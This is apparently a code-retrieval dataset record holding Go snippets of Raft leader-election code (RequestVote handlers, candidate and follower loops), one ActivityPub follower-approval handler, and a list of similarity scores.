DPrintf(\"%d(%d|term%d|vote%d) replyed %d(%d) with %s\", rf.me, rf.state, rf.currentTerm, rf.votedFor, args.CandidateId, args.Term, reply)\n\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif (rf.votedFor == -1 || rf.votedFor == args.CandidateId) && args.LastLogIndex >= rf.lastApplied {\n\t\t//rf.resetHeartBeatsTimer()\n\n\t\treply.VoteGranted = true\n\t\t// rf.currentTerm += 1\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = args.CandidateId\n\t\trf.state = FOLLOWER\n\t\treturn\n\t} else {\n\t\treply.VoteGranted = false\n\t}\n\treply.Term = rf.currentTerm\n}", "func (rf *Raft) follower() {\n\tgo rf.startElectionTimer()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\n\trf.mu.Lock()\n\trf.debug(\"***************Inside the RPC handler for sendRequestVote *********************\")\n\tdefer rf.mu.Unlock()\n\tvar lastIndex int\n\t//var lastTerm int\n\tif len(rf.log) > 0 {\n\t\tlastLogEntry := rf.log[len(rf.log)-1]\n\t\tlastIndex = lastLogEntry.LastLogIndex\n\t\t//lastTerm = lastLogEntry.lastLogTerm\n\t}else{\n\t\tlastIndex = 0\n\t\t//lastTerm = 0\n\t}\n\treply.Term = rf.currentTerm\n\t//rf.debug()\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\trf.debug(\"My term is higher than candidate's term, myTerm = %d, candidate's term = %d\", rf.currentTerm,args.Term )\n\t} else if (rf.votedFor == -1 || rf.votedFor == args.CandidateId) && args.LastLogIndex >= lastIndex {\n\t\trf.votedFor = args.CandidateId\n\t\treply.VoteGranted = true\n\t\trf.currentTerm = args.Term\n\t\trf.resetElectionTimer()\n\t\t//rf.debug(\"I am setting my currentTerm to -->\",args.Term,\"I am \",rf.me)\n\t}\n}", "func (rf *Raft) sendVote(server int, args VoteArgs, reply *VoteReply) bool {\n\tok := rf.peers[server].Call(\"Raft.Vote\", args, reply)\n\treturn ok\n}", "func (r *Raft) runFollower() {\n\tfor {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\t// Handle the command\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\tr.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\tr.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"In follower state, got unexpected command: %#v\", rpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\t\tcase <-randomTimeout(r.conf.HeartbeatTimeout, r.conf.ElectionTimeout):\n\t\t\t// Heartbeat failed! Go to the candidate state\n\t\t\tr.logW.Printf(\"Heartbeat timeout, start election process\")\n\t\t\tr.setState(Candidate)\n\t\t\treturn\n\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func ApproveFollower(w http.ResponseWriter, r *http.Request) {\n\tif !requirePOST(w, r) {\n\t\treturn\n\t}\n\n\ttype approveFollowerRequest struct {\n\t\tActorIRI string `json:\"actorIRI\"`\n\t\tApproved bool `json:\"approved\"`\n\t}\n\n\tdecoder := json.NewDecoder(r.Body)\n\tvar approval approveFollowerRequest\n\tif err := decoder.Decode(&approval); err != nil {\n\t\tcontrollers.WriteSimpleResponse(w, false, \"unable to handle follower state with provided values\")\n\t\treturn\n\t}\n\n\tif approval.Approved {\n\t\t// Approve a follower\n\t\tif err := persistence.ApprovePreviousFollowRequest(approval.ActorIRI); err != nil {\n\t\t\tcontrollers.WriteSimpleResponse(w, false, err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tlocalAccountName := data.GetDefaultFederationUsername()\n\n\t\tfollowRequest, err := persistence.GetFollower(approval.ActorIRI)\n\t\tif err != nil {\n\t\t\tcontrollers.WriteSimpleResponse(w, false, err.Error())\n\t\t\treturn\n\t\t}\n\n\t\t// Send the approval to the follow requestor.\n\t\tif err := requests.SendFollowAccept(followRequest.Inbox, followRequest.RequestObject, localAccountName); err != nil {\n\t\t\tcontrollers.WriteSimpleResponse(w, false, err.Error())\n\t\t\treturn\n\t\t}\n\t} else {\n\t\t// Remove/block a follower\n\t\tif err := persistence.BlockOrRejectFollower(approval.ActorIRI); err != nil {\n\t\t\tcontrollers.WriteSimpleResponse(w, false, err.Error())\n\t\t\treturn\n\t\t}\n\t}\n\n\tcontrollers.WriteSimpleResponse(w, true, \"follower updated\")\n}", "func (rf *Raft) sendRequestVote(server int, args RequestVoteArgs, reply *RequestVoteReply, once *sync.Once) bool {\n\tok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n\tif ok {\n\t\tif rf.identity != CANDIDATE {\n\t\t\treturn ok\n\t\t}\n\t\tif reply.Term > rf.CurrentTerm {\n\t\t\trf.CurrentTerm = reply.Term\n\t\t\trf.identity = FOLLOWER\n\t\t\treturn ok\n\t\t}\n\t\tif reply.VoteGranted == true {\n\t\t\trf.votes++\n\t\t\t//fmt.Println(\"peer\", server, \"vote peer\", rf.me, \"at term\", rf.CurrentTerm)\n\t\t\tif rf.votes > len(rf.peers)/2 {\n\t\t\t\tonce.Do(func() {\n\t\t\t\t\trf.hasBecomeLeader <- true\n\t\t\t\t})\n\t\t\t\treturn ok\n\t\t\t}\n\t\t}\n\t}\n\treturn ok\n}", "func (r *Node) requestVotes(electionResults chan bool, fallbackChan chan bool, currTerm uint64) {\n\t// Votes received\n\tremaining := 0\n\tresultChan := make(chan RequestVoteResult)\n\tfor _, peer := range r.Peers {\n\t\tif r.Self.GetId() == peer.GetId() {\n\t\t\tcontinue\n\t\t}\n\t\tmsg := rpc.RequestVoteRequest{\n\t\t\tTerm: currTerm,\n\t\t\tCandidate: r.Self,\n\t\t\tLastLogIndex: r.LastLogIndex(),\n\t\t\tLastLogTerm: r.GetLog(r.LastLogIndex()).GetTermId(),\n\t\t}\n\t\tremaining++\n\t\tgo r.requestPeerVote(peer, &msg, resultChan)\n\t}\n\n\tvote := 1\n\treject := 0\n\tmajority := r.config.ClusterSize/2 + 1\n\tif vote >= majority {\n\t\telectionResults <- true\n\t\treturn\n\t}\n\tfor remaining > 0 {\n\t\trequestVoteResult := <-resultChan\n\t\tremaining--\n\t\tif requestVoteResult == RequestVoteFallback {\n\t\t\tfallbackChan <- true\n\t\t\treturn\n\t\t}\n\t\tif requestVoteResult == RequestVoteSuccess {\n\t\t\tvote++\n\t\t\tif vote >= majority {\n\t\t\t\telectionResults <- true\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\treject++\n\t\t\tif reject >= majority {\n\t\t\t\telectionResults <- false\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.persist()\n\tdefer rf.mu.Unlock()\n\treply.Term = rf.CurrentTerm\n\n\tif args.Term < rf.CurrentTerm {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif args.Term > rf.CurrentTerm {\n\t\trf.VotedFor = -1\n\t\trf.CurrentTerm = args.Term\n\t\trf.identity = FOLLOWER\n\t}\n\n\tif rf.VotedFor != -1 && rf.VotedFor != args.CandidateId {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\tvar rfLogIndex int\n\tvar rfLogTerm int\n\tif len(rf.Log) > 0 {\n\t\trfLogIndex = rf.Log[len(rf.Log)-1].Index\n\t\trfLogTerm = rf.Log[len(rf.Log)-1].Term\n\t} else {\n\t\trfLogIndex = rf.lastIncludedIndex\n\t\trfLogTerm = rf.lastIncludedTerm\n\t}\n\n\tif args.LastLogTerm > rfLogTerm || args.LastLogTerm == rfLogTerm && args.LastLogIndex >= rfLogIndex {\n\t\treply.VoteGranted = true\n\t\trf.VotedFor = args.CandidateId\n\t\trf.identity = FOLLOWER\n\t\trf.hasVoted <- true\n\t} else {\n\t\treply.VoteGranted = false\n\t}\n}", "func (rf *Raft) RequestVoteHandler(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.lock(\"RVHandler lock\")\n\treply.Term = rf.currentTerm // update requester to follower (if currentTerm > args.CTerm)\n\n\tif args.CTerm < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\trf.unlock(\"RVHandler lock\")\n\t\treturn\n\t}\n\n\tif args.CTerm > rf.currentTerm {\n\t\trf.receivedLargerTerm(args.CTerm)\n\t}\n\n\tif (rf.votedFor == -1 || rf.votedFor == args.CID) && rf.isCandidateMoreUTD(args) {\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CID\n\t\trf.persist()\n\t} else {\n\t\treply.VoteGranted = false\n\t}\n\trf.unlock(\"RVHandler lock\")\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\t//log.Println(\"Raft \", rf.me, \"term \", rf.currentTerm, \" receive vote request from Raft \", args.Me, \" term \", args.Term)\n\treply.Me = rf.me\n\n\tif args.Term == rf.currentTerm {\n\t\tif args.Me != rf.leader {\n\t\t\treply.Agree = false\n\t\t} else {\n\t\t\t// heartbeat, reset timer\n\t\t\treply.Agree = true\n\t\t\trf.resetElectionTimer()\n\t\t\t//log.Println(\"rf \", args.Me, \" -> rf \", rf.me)\n\t\t}\n\n\t} else if args.Term > rf.currentTerm {\n\t\t// vote request\n\t\t_, voted := rf.votedTerms[args.Term]\n\n\t\tif voted {\n\t\t\treply.Agree = false\n\n\t\t} else {\n\t\t\trf.stopElectionTimer()\n\n\t\t\t// new term start\n\t\t\tif rf.leader == rf.me {\n\t\t\t\trf.dethrone()\n\t\t\t}\n\n\t\t\treply.Agree = true\n\t\t\trf.leader = args.Me\n\t\t\trf.votedTerms[args.Term] = args.Me\n\t\t\trf.currentTerm = args.Term\n\t\t\trf.resetElectionTimer()\n\t\t\tlog.Println(\"Server \", rf.me, \" vote server \", args.Me, \" as leader in term \",\n\t\t\t\targs.Term)\n\t\t}\n\n\t} else {\n\t\treply.Agree = false\n\t}\n\t//log.Println(\"Raft \", rf.me, \" reply \", args.Me, \" reply: \", reply)\n}", "func (tester *FollowTester) follow(t *testing.T, d *Dandelion) {\n\ta := assert.New(t)\n\ta.NoError(tester.acc0.SendTrxAndProduceBlock(Follow(tester.acc0.Name, tester.acc1.Name, false)))\n}", "func (node *Node) updateStateToFollower(latestTerm int) {\n\tnode.currentTerm = latestTerm\n\tnode.state = follower\n\tnode.votedFor = -1\n\n\tnode.timeSinceTillLastReset = time.Now()\n\n\t// Start the followers election timer concurrently.\n\tgo node.startElectionTimer()\n}", "func (rf *Raft) isCandidateMoreUTD(args *RequestVoteArgs) bool {\n\tlastIndex := rf.absoluteLength() - 1\n\tif args.CLastLogTerm > rf.findLogTermByAbsoluteIndex(lastIndex) {\n\t\treturn true\n\t}\n\tif args.CLastLogTerm == rf.findLogTermByAbsoluteIndex(lastIndex) {\n\t\tif args.CLastLogIndex >= lastIndex {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (r *Raft) candidate(timeout int) int {\n\twaitTime := timeout //added for passing timeout from outside--In SingleServerBinary\n\tresendTime := 5 //should be much smaller than waitTime\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\t//reset the Votes else it will reflect the Votes received in last Term\n\t\tr.resetVotes()\n\t\tr.myCV.CurrentTerm += 1 //increment current Term\n\t\tr.myCV.VotedFor = r.Myconfig.Id //Vote for self\n\t\tr.WriteCVToDisk() //write Current Term and VotedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].Vote = true //vote true\n\t\treqVoteObj := r.prepRequestVote() //prepare request Vote obj\n\t\tr.sendToAll(reqVoteObj) //send requests for Vote to all servers\n\t\tResendVoteTimer := r.StartTimer(ResendVoteTimeOut, resendTime)\n\t\tfor { //this loop for reading responses from all servers\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase ClientAppendReq: ///candidate must also respond as false just like follower\n\t\t\t\trequest := req.(ClientAppendReq) //explicit typecasting\n\t\t\t\tresponse := ClientAppendResponse{}\n\t\t\t\tlogItem := LogItem{r.CurrentLogEntryCnt, false, request.Data} //lsn is count started from 0\n\t\t\t\tr.CurrentLogEntryCnt += 1\n\t\t\t\tresponse.LogEntry = logItem\n\t\t\t\tr.CommitCh <- &response.LogEntry\n\t\t\tcase RequestVoteResponse: //got the Vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\tif response.VoteGranted {\n\t\t\t\t\tr.f_specific[response.Id].Vote = true\n\t\t\t\t}\n\t\t\t\tVoteCount := r.countVotes()\n\t\t\t\tif VoteCount >= majority {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of Votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\tretVal := r.serviceAppendEntriesReq(request, nil, 0, candidate)\n\t\t\t\tif retVal == follower {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t}\n\n\t\t\tcase RequestVote:\n\t\t\t\trequest := req.(RequestVote)\n\t\t\t\t//==Can be shared with service request vote with additinal param of caller(candidate or follower)\n\t\t\t\tresponse := RequestVoteResponse{} //prep response object,for responding back to requester\n\t\t\t\tcandidateId := request.CandidateId\n\t\t\t\tresponse.Id = r.Myconfig.Id\n\t\t\t\tif r.isDeservingCandidate(request) {\n\t\t\t\t\tresponse.VoteGranted = true\n\t\t\t\t\tr.myCV.VotedFor = candidateId\n\t\t\t\t\tr.myCV.CurrentTerm = request.Term\n\t\t\t\t\tif request.Term > r.myCV.CurrentTerm { //write to disk only when value has changed\n\t\t\t\t\t\tr.WriteCVToDisk()\n\t\t\t\t\t}\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\tresponse.VoteGranted = false\n\t\t\t\t}\n\t\t\t\tresponse.Term = r.myCV.CurrentTerm\n\t\t\t\tr.send(candidateId, response)\n\n\t\t\tcase int:\n\t\t\t\ttimeout := req.(int)\n\t\t\t\tif timeout == ResendVoteTimeOut {\n\t\t\t\t\trT := msecs * time.Duration(resendTime)\n\t\t\t\t\tResendVoteTimer.Reset(rT)\n\t\t\t\t\treqVoteObj := r.prepRequestVote() //prepare request Vote agn and send to all, ones rcvg the vote agn will vote true agn so won't matter and countVotes func counts no.of true entries\n\t\t\t\t\tr.sendToAll(reqVoteObj)\n\t\t\t\t} else if timeout == ElectionTimeout {\n\t\t\t\t\twaitTime_msecs := msecs * time.Duration(waitTime)\n\t\t\t\t\tElectionTimer.Reset(waitTime_msecs)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\tif args.Term < rf.currentTerm {\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGranted = false\n\t\t\treturn\n\t\t}\n\tif args.Term > rf.currentTerm{\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.role = 0\n\t\trf.roleChan <- 0\n\t\t}\n\treply.Term = args.Term\n\tfmt.Printf(\"LastLogTerm:%v rf.log:%v sever:%v \\n\", args.LastLogTerm, rf.log[len(rf.log)-1].Term, rf.me)\n\tif rf.votedFor != -1 && rf.votedFor != args.CandidateId {\n\t reply.VoteGranted = false \n\t }else if rf.log[len(rf.log)-1].Term > args.LastLogTerm{\n\t \treply.VoteGranted = false\n\t }else if rf.log[len(rf.log)-1].Index > args.LastLogIndex && rf.log[len(rf.log)-1].Term == args.LastLogTerm{\n\t \treply.VoteGranted = false\n\t }else{\n\t fmt.Printf(\"Server %v vote for server %v \\n\", rf.me, args.CandidateId)\n\t reply.VoteGranted = true\n\t rf.votedFor = args.CandidateId\n\t rf.GrantVote <- true\n\t }\n\n\t}", "func (node *Node) runElection() {\n\tnode.currentTerm++\n\tcurrentTerm := node.currentTerm\n\tnode.state = candidate\n\tnode.votedFor = node.id\n\tnode.timeSinceTillLastReset = time.Now()\n\n\tlog.Printf(\"Node %d has become a candidate with currentTerm=%d\", node.id, node.currentTerm)\n\n\t// We vote for ourselves.\n\tvar votesReceived int32 = 1\n\n\t// Send votes to all the other machines in the raft group.\n\tfor _, nodeID := range node.participantNodes {\n\t\tgo func(id int) {\n\t\t\tvoteRequestArgs := RequestVoteArgs{\n\t\t\t\tterm: currentTerm,\n\t\t\t\tcandidateID: id,\n\t\t\t}\n\n\t\t\tvar reply RequestVoteReply\n\t\t\tlog.Printf(\"Sending a RequestVote to %d with args %+v\", id, voteRequestArgs)\n\n\t\t\tif err := node.server.Call(id, \"Node.RequestVote\", voteRequestArgs, &reply); err == nil {\n\t\t\t\tlog.Printf(\"Received a response for RequestVote from node %d saying %+v, for the election started by node %d\", id, reply, node.id)\n\n\t\t\t\tnode.mu.Lock()\n\t\t\t\tdefer node.mu.Unlock()\n\n\t\t\t\t// If the state of the current node has changed by the time the election response arrives then we must back off.\n\t\t\t\tif node.state != candidate {\n\t\t\t\t\tlog.Printf(\"The state of node %d has changed from candidate to %s while waiting for an election response\", node.id, node.state)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// If the node responds with a higher term then we must back off from the election.\n\t\t\t\tif reply.term > currentTerm {\n\t\t\t\t\tnode.updateStateToFollower(reply.term)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif reply.term == currentTerm {\n\t\t\t\t\tif reply.voteGranted {\n\t\t\t\t\t\tvotes := int(atomic.AddInt32(&votesReceived, 1))\n\t\t\t\t\t\t// Check for majority votes having been received.\n\t\t\t\t\t\tif votes > (len(node.participantNodes)+1)/2 {\n\t\t\t\t\t\t\tlog.Printf(\"The election has been won by node %d\", node.id)\n\t\t\t\t\t\t\tnode.updateStateToLeader()\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}(nodeID)\n\t}\n}", "func (r *Raft) requestVote(rpc RPC, req *RequestVoteRequest) (transition bool) {\n\tr.peerLock.Lock()\n\tdefer r.peerLock.Unlock()\n\t// Setup a response\n\tpeers := make([][]byte, 0, len(r.peers))\n\tfor _, p := range r.peers {\n\t\tpeers = append(peers, []byte(p.String()))\n\t}\n\tresp := &RequestVoteResponse{\n\t\tTerm: r.getCurrentTerm(),\n\t\tGranted: false,\n\t\tPeers: peers,\n\t}\n\tvar err error\n\tdefer rpc.Respond(resp, err)\n\n\t// Ignore an older term\n\tif req.Term < r.getCurrentTerm() {\n\t\terr = errors.New(\"obsolete term\")\n\t\treturn\n\t}\n\n\t// Increase the term if we see a newer one\n\tif req.Term > r.getCurrentTerm() {\n\t\tif err := r.setCurrentTerm(req.Term); err != nil {\n\t\t\tr.logE.Printf(\"Failed to update current term: %w\", err)\n\t\t\treturn\n\t\t}\n\t\tresp.Term = req.Term\n\n\t\t// Ensure transition to follower\n\t\ttransition = true\n\t\tr.setState(Follower)\n\t}\n\n\t// Check if we have voted yet\n\tlastVoteTerm, err := r.stable.GetUint64(keyLastVoteTerm)\n\tif err != nil && err.Error() != \"not found\" {\n\t\tr.logE.Printf(\"raft: Failed to get last vote term: %w\", err)\n\t\treturn\n\t}\n\tlastVoteCandyBytes, err := r.stable.Get(keyLastVoteCand)\n\tif err != nil && err.Error() != \"not found\" {\n\t\tr.logE.Printf(\"raft: Failed to get last vote candidate: %w\", err)\n\t\treturn\n\t}\n\n\t// Check if we've voted in this election before\n\tif lastVoteTerm == req.Term && lastVoteCandyBytes != nil {\n\t\tr.logW.Printf(\"raft: Duplicate RequestVote for same term: %d\", req.Term)\n\t\tif bytes.Compare(lastVoteCandyBytes, req.Candidate) == 0 {\n\t\t\tr.logW.Printf(\"raft: Duplicate RequestVote from candidate: %s\", req.Candidate)\n\t\t\tresp.Granted = true\n\t\t}\n\t\treturn\n\t}\n\n\t// Reject if their term is older\n\tif r.getLastLogIndex() > 0 {\n\t\tvar lastLog Log\n\t\tif err := r.logs.GetLog(r.getLastLogIndex(), &lastLog); err != nil {\n\t\t\tr.logE.Printf(\"Failed to get last log: %d %v\",\n\t\t\t\tr.getLastLogIndex(), err)\n\t\t\treturn\n\t\t}\n\t\tif lastLog.Term > req.LastLogTerm {\n\t\t\tr.logW.Printf(\"Rejecting vote since our last term is greater\")\n\t\t\treturn\n\t\t}\n\n\t\tif lastLog.Index > req.LastLogIndex {\n\t\t\tr.logW.Printf(\"Rejecting vote since our last index is greater\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t// Persist a vote for safety\n\tif err := r.persistVote(req.Term, req.Candidate); err != nil {\n\t\tr.logE.Printf(\"raft: Failed to persist vote: %w\", err)\n\t\treturn\n\t}\n\n\tresp.Granted = true\n\treturn\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\t/*\n\tIf votedFor is null or candidateId, and candidate’s\n\tlog is at least as up-to-date as receiver’s log, grant vote\n\t */\n\tif rf.isCandidateUpToDate(args) &&\n\t\t(rf.votedFor == -1 || rf.votedFor == args.CandidateId) {\n\t\t// grant vote and update rf's term.\n\t\trf.currentTerm = args.Term\n\n\t\treply.Term = args.Term\n\n\t\treply.VoteGranted = true\n\t} else {\n\t\t// don't grant vote to the candidate.\n\t\treply.Term = rf.currentTerm\n\n\t\treply.VoteGranted = false\n\t}\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) { //RequestVote handdler\r\n\t// Your code here.\r\n\trf.mu.Lock() //get the lock\r\n\tdefer rf.mu.Unlock()\r\n\tif args.Term < rf.currentTerm {\r\n\t\treply.VoteGranted = false\r\n\t\treply.Term = rf.currentTerm\r\n\t}else if args.Term > rf.currentTerm {\r\n\t\trf.currentTerm = args.Term\r\n\t\trf.updateStateTo(FOLLOWER)\r\n\t\trf.votedFor = args.CandidateId\r\n\t\treply.VoteGranted = true\r\n\t}else {\r\n\t\tif rf.votedFor == -1 {//haven't vote for anyone\r\n\t\t\trf.votedFor = args.CandidateId\r\n\t\t\treply.VoteGranted = true\r\n\t\t}else {\r\n\t\t\treply.VoteGranted = false\r\n\t\t}\r\n\t}\r\n\tif reply.VoteGranted == true { // vote for current requester\r\n\t\tgo func() { rf.voteCh <- struct{}{} }() //send the struct{}{} to the voteCh channel\r\n\t}\t\r\n}", "func (rf *Raft) sendRequestVote(server int, args *RequestVoteArgs, reply *RequestVoteReply) bool {\n ok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n return ok\n}" ]
[ "0.65611714", "0.60730743", "0.59893113", "0.5856957", "0.5796058", "0.578427", "0.57096905", "0.5693165", "0.5662607", "0.5610894", "0.5576574", "0.5562577", "0.5519122", "0.54921544", "0.54869354", "0.54458255", "0.54402566", "0.5409583", "0.53818727", "0.5380176", "0.5377343", "0.53773296", "0.5371344", "0.53697", "0.5369234", "0.5361345", "0.5356041", "0.53189796", "0.5312552", "0.5300348", "0.5293509", "0.5287328", "0.5286122", "0.526979", "0.52531", "0.52517253", "0.5251498", "0.5231431", "0.52267647", "0.5211066", "0.5191111", "0.51854676", "0.517186", "0.51696384", "0.5163219", "0.51502156", "0.5145948", "0.51443857", "0.51425445", "0.51224554", "0.51081336", "0.5107074", "0.510242", "0.5097974", "0.5082801", "0.5073725", "0.50589734", "0.50558305", "0.505167", "0.50333303", "0.5032095", "0.50315934", "0.5026902", "0.50264263", "0.5012695", "0.50104904", "0.50054646", "0.49960682", "0.49832338", "0.49816296", "0.49747935", "0.49650955", "0.49632773", "0.4954108", "0.4947558", "0.49175882", "0.48965693", "0.48952112", "0.48931557", "0.48731315", "0.48666418", "0.48566237", "0.48521355", "0.48508078", "0.48425993", "0.48418117", "0.4826389", "0.48005962", "0.47978908", "0.47970194", "0.4793126", "0.47752663", "0.4773568", "0.4765657", "0.47626826", "0.47584423", "0.4755355", "0.4735709", "0.47316083", "0.47100234" ]
0.7265358
0
TestCandidateFallback tests that while waiting for votes, if a candidate receives an AppendEntries RPC from another server claiming to be leader whose term is at least as large as the candidate's current term, it recognizes the leader as legitimate and returns to follower state. Reference: section 5.2
func TestCandidateFallback(t *testing.T) { tests := []pb.Message{ {From: 2, To: 1, Term: 1, Type: pb.MsgApp}, {From: 2, To: 1, Term: 2, Type: pb.MsgApp}, } for i, tt := range tests { r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage()) defer closeAndFreeRaft(r) r.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup}) if r.state != StateCandidate { t.Fatalf("unexpected state = %s, want %s", r.state, StateCandidate) } r.Step(tt) if g := r.state; g != StateFollower { t.Errorf("#%d: state = %s, want %s", i, g, StateFollower) } if g := r.Term; g != tt.Term { t.Errorf("#%d: term = %d, want %d", i, g, tt.Term) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func testNonleaderStartElection(t *testing.T, state StateType) {\n\t// election timeout\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tswitch state {\n\tcase StateFollower:\n\t\tr.becomeFollower(1, 2)\n\tcase StateCandidate:\n\t\tr.becomeCandidate()\n\t}\n\n\tfor i := 1; i < 2*et; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.Term != 2 {\n\t\tt.Errorf(\"term = %d, want 2\", r.Term)\n\t}\n\tif r.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateCandidate)\n\t}\n\tif !r.votes[r.id] {\n\t\tt.Errorf(\"vote for self = false, want true\")\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func TestLeaderElectionInOneRoundRPC(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tvotes map[uint64]bool\n\t\tstate StateType\n\t}{\n\t\t// win the election when receiving votes from a majority of the servers\n\t\t{1, map[uint64]bool{}, StateLeader},\n\t\t{3, map[uint64]bool{2: true, 3: true}, StateLeader},\n\t\t{3, map[uint64]bool{2: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true}, StateLeader},\n\n\t\t// return to follower state if it receives vote denial from a majority\n\t\t{3, map[uint64]bool{2: false, 3: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: false, 3: false, 4: false, 5: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: true, 3: false, 4: false, 5: false}, StateFollower},\n\n\t\t// stay in candidate if it does not obtain the majority\n\t\t{3, map[uint64]bool{}, StateCandidate},\n\t\t{5, map[uint64]bool{2: true}, StateCandidate},\n\t\t{5, map[uint64]bool{2: false, 3: false}, StateCandidate},\n\t\t{5, map[uint64]bool{}, StateCandidate},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tfor id, vote := range tt.votes {\n\t\t\tr.Step(pb.Message{From: id, To: 1, Term: r.Term, Type: pb.MsgVoteResp, Reject: !vote})\n\t\t}\n\n\t\tif r.state != tt.state {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, r.state, tt.state)\n\t\t}\n\t\tif g := r.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, 1)\n\t\t}\n\t}\n}", "func (r *Raft) candidate(timeout int) int {\n\twaitTime := timeout //added for passing timeout from outside--In SingleServerBinary\n\tresendTime := 5 //should be much smaller than waitTime\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\t//reset the Votes else it will reflect the Votes received in last 